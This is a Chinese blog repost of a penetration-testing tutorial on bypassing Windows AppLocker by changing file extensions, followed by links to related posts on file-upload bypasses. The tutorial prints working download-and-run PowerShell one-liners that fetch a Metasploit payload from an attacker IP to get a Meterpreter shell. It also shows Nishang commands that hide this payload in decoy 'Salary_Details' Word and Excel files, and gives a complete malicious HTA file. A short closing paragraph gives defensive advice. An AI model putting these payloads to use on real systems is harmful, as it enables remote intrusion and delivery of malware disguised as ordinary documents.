看我如何利用文件扩展名绕过AppLocker?

最新推荐文章于 2024-05-14 09:05:18 发布
最新推荐文章于 2024-05-14 09:05:18 发布
阅读量152 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/217443
版权
本文讲的是 看我如何利用文件扩展名绕过AppLocker?绕过AppLocker的限制通常需要使用Microsoft信任的二进制文件来执行代码或弱路径规则。然而,在系统中,系统已经配置了默认规则,并且允许使用命令提示符和PowerShell来通过使用具有不同文件扩展名的有效载荷来绕过AppLocker。

可以使用Metasploit 的Web delivery模块来托管要使用到的powershell有效载荷,并从目标中检索传入的连接。

exploit/multi/script/web_delivery

看我如何利用文件扩展名绕过AppLocker?

Web Delivery模块 – PowerShell有效载荷

默认情况下,直接从命令提示符执行.bat文件将会被阻止,.bat文件不允许执行。

看我如何利用文件扩展名绕过AppLocker?

AppLocker – 限制bat文件的执行

但是,通过将此文件的扩展名更改为.txt并从命令提示符执行相同的有效载荷后将会返回一个Meterpreter会话。

cmd.exe /K < payload.txt

看我如何利用文件扩展名绕过AppLocker?

命令提示符 –将.bat文件作为txt执行

payload.txt

@echo off
powershell.exe -nop -w hidden -c IEX   (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');
PAUSE

在PowerShell中,可以使用Get-Content cmdlet读取txt文件的内容,然后利用Invoke-Expression运行payload-powershell.txt文件中包含的命令:

IEX (new-object   net.webclient).downloadstring('
http://192.168.100.3:8080/9Q21wiSds9E0pxi
');

看我如何利用文件扩展名绕过AppLocker?

PowerShell – 从txt文件中执行有效载荷

Metasploit监听器将收到两个Meterpreter会话:

看我如何利用文件扩展名绕过AppLocker?

Web Delivery – 获取Meterpreter会话

文件扩展名

像Microsoft Word和Excel这类应用程序系统应该是允许执行的,并且可以作为另一种方法来传递绕过AppLocker的恶意有效载荷。Nishang PowerShell框架可用于生成各种文件后缀,其中可以包含特定的有效载荷,如:

DOC
XLS
HTA
LNK

应该注意到的是,系统需要先安装office,否则nishang将无法生成相关的文件。

PS C:nishangClient> Import-Module   .Out-Word.ps1
PS C:nishangClient> Import-Module   .Out-Excel.ps1
PS C:nishangClient> Out-Word -Payload   "powershell.exe -nop -w hidden -c IEX (new-object   net.webclient).downloadstring(
'http://192.168.100.3:8080/9Q21wiSds9E0pxi');"
Saved to file   C:nishangClientSalary_Details.doc
0
PS C:nishangClient> Out-Excel -Payload   "powershell.exe -nop -w hidden -c IEX (new-object   net.webclient).downloadstring
('http://192.168.100.3:8080/9Q21wiSds9E0pxi');"
Saved to file   C:nishangClientSalary_Details.xls
0
PS C:nishangClient>

看我如何利用文件扩展名绕过AppLocker?

Nishang – 嵌入了恶意有效载荷的Word和Excel文件

Nishang还有两个PowerShell脚本,可以用来生成嵌入了PowerShell有效载荷的CHM文件和快捷方式。应该注意到的是,Nishang 依赖于HTML Help Workshop应用程序来生成.CHM文件。

看我如何利用文件扩展名绕过AppLocker?

Nishang – 编译HTML文件和嵌入了恶意有效载荷的快捷方式

以下代码可用于通过.HTA应用程序绕过AppLocker和其他应用程序白名单软件。

pentestlab.hta

<HTML>
<HEAD>
<script language="VBScript">
Set objShell =   CreateObject("Wscript.Shell")
objShell.Run "powershell -nop -exec   bypass -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.3:8080/9Q21wiSds9E0pxi')"
</script>
</HEAD>
<BODY>
</BODY>
</HTML>

下面的所有文件扩展名都可以执行托管在远程的用于绕过AppLocker规则的powershell有效载荷。

看我如何利用文件扩展名绕过AppLocker?

Nishang – 生成的文件扩展名

结论

启用AppLocker而不阻止命令提示符和PowerShell那么仍然是可以允许执行代码的,即使特定的文件扩展名被阻止。系统所有者和IT管理员需要删除可以执行代码(如果这些应用程序不提供特定业务目的的话)的信任应用程序,并且为标准用户启用拒绝命令提示符和PowerShell执行的规则以及DLL规则。




原文发布时间为:2017年6月14日
本文作者:李白
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
weixin_34269583
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传后缀绕过
12-13
在上传的限制不能上传某些的后缀,对于上传中各绕过的描述
Web安全原理剖析(二十三)——文件后缀绕过
Phantom03167的博客
01-14 978
文件后缀绕过
文件上传】绕过总结
weixin_55205599的博客
07-02 2927
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上传.jpg,不允许上传.php,如何绕过传.php一句话木马呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
文件上传--Upload-labs--Pass03--特殊后缀与::$DATA绕过
2302_79800344的博客
02-17 1509
利用特殊后缀名 或 ::$DATA 绕过何尝不是一种好的选择
网络安全最新【文件上传】绕过总结_文件上传后缀名绕过,【一步教学,一步到位
2401_84558406的博客
05-10 832
eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"pphphp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:黑名单过滤中只有".php",有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:“a.php.”,黑名单有对"php."过滤,则绕过。思路:已知过滤规则,假如都是过滤一次,则可尝试两次绕过。eg: a.php改为 a.php::$data。而php在传输中,可识别。
UltimateAppLockerByPassList:此存储库的目标是记录绕过AppLocker的最常用技术
02-25
由于可以以不同的方式配置AppLocker,因此我维护一个经过验证的绕过列表(适用于默认的AppLocker规则)和一个具有可能的绕过技术的列表(取决于配置),或者声称是某人绕过的列表。 我还列出了通用的绕过技术以及要...
Microsoft-Applocker-Bypass:绕过微软applocker的新技术
06-03
微软-Applocker-绕过一种绕过微软applocker的新技术。什么是 AppLockerAppLocker 是 Windows 7 和 Windows Server 2008 R2 中的一项新功能,允许您根据文件的唯一标识指定哪些用户或组可以在您的组织中运行特定...
PowerShdll:使用rundll32运行PowerShell绕过软件限制
02-05
PowerShdll可以与以下程序一起运行:rundll32.exe,installutil.exe,regsvcs.exe,regasm.exe,regsvr32.exe或作为独立的可执行文件运行。dll模式:Rundll32: Usage:rundll32 PowerShdll,main [removed]rundll32 ...
AppLocker-Guidance:使用AppLocker实施应用程序白名单的配置指南。 #nsacyber
02-06
- AppLocker不能阻止所有类型的恶意行为,比如某些脚本或动态加载的模块可能绕过规则。 - 谨慎处理更新和升级,以免意外阻止关键服务。 - 在多层安全策略中,AppLocker应作为补充,而不是唯一防线。 总的来说,...
AppLocker 2.6.0 - 给MacAPP加上密码访问
06-02
AppLocker可以使用密码保护Mac上的各个APP应用程序。它易于使用,绝对不需要配置。只需启动AppLocker,添加密码,然后选择您想要保密的应用。 当您将计算机借给客人,朋友或家人时,请使用此工具并停止担心您的隐私...
文件上传】绕过总结_文件上传后缀名绕过(2),2024BAT大厂网络安全社招面试题
2401_83974660的博客
04-16 983
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"pphphp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。到此为止,大概1个月的时间。
后缀名检测与绕过之Windows特性(::$DATA)绕过
m0_73720136的博客
05-06 1105
掌握文件上传的服务端检测中的后缀名检测原理,“【::$DATA】”在Windows下是不被允许的,利用Burp Suite抓包在文件后缀名处添加“【::$DATA】”,绕过服务端的验证后上传文件,Windows会自动去掉后面添加的::$DATA。
上传绕过文件后缀_文件上传绕过思路拓展_入门信息安全技巧
最新发布
程序员六七的博客
05-14 285
引言分享一些文件上传绕过的思路,下文内容多包含实战图片,所以打码会非常严重,可多看文字表达;本文仅用于交流学习
多种文件上传绕过手法
aurora__的博客
05-08 1135
转载自安全脉搏95zz 相信大家都或多或少遇到过上传的问题,本文讲些小技巧,原理用文字叙述实在麻烦 目录:JS验证实例 /大小写/双重后缀名/过滤绕过/特殊后缀名/文件流类型/文件重写 1.javascript验证突破 查看源代码 在IE中禁用掉即可(火狐的noscript插件也行) 2.大小写突破 他只是把php做了限制,改成Php就可以了 3.双重后缀名突破 在...
Web安全—文件上传(解析)漏洞
zhdf160916的博客
11-21 6172
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传:文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
文件上传】绕过总结_文件上传后缀名绕过(1),经验分享
2401_83974660的博客
04-16 619
eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"pphphp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:黑名单过滤中只有".php",有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:“a.php.”,黑名单有对"php."过滤,则绕过。思路:已知过滤规则,假如都是过滤一次,则可尝试两次绕过。eg: a.php改为 a.php::$data。
后缀名检测与绕过之大小写绕过
m0_73720136的博客
05-06 306
掌握文件上传的服务端检测中的后缀名检测原理以及通过大小写的转换来绕过后缀名的检测。
文件上传绕过方法汇总
xiaoheizi的博客
06-12 7422
先上传1.php,它的目的是让服务器上的php来创建一个2.php,我们在1.php被删除之前访问到他,就可以在服务器中创建2.php,2.php是一个木马文件,但是这个是系统自身创建的,所以不会被删除。假如我不断的上传发包,然后我同时也不断的访问那个我们上传上去的文件的地址,我们就开始和服务器的函数比手速了,函数执行都是要时间的,如果我这边上传上去,且有删除,那个时间可能很短,然后被我访问到了,岂不是就可以执行PHP了。
文件上传】绕过总结_文件上传后缀名绕过,大厂网络安全研发岗面试复盘
m0_61330806的博客
04-09 871
ab:a.php::$data 相当于访问ab文件夹下的a.phpeg: a.php改为 a.php::$data5、单次过滤绕过思路:已知过滤规则,假如都是过滤一次,则可尝试两次绕过6、后缀双写绕过场景:过滤规则检测到黑名单后缀时,将文件名中对应后缀删除的情况eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"pphphp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php程序认为处理完毕,不拦截,故绕过白名单绕过
Windows内网攻防:COM文件利用与持久化机制解析
此外,文档还概述了内网攻击的各种手段,如跨边界和端口转发,利用AppLocker规则绕过,提升用户权限(BypassUAC),获取用户哈希值,横向移动,以及域渗透。这些技术通常用于在内网环境中扩大攻击范围,控制更多系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值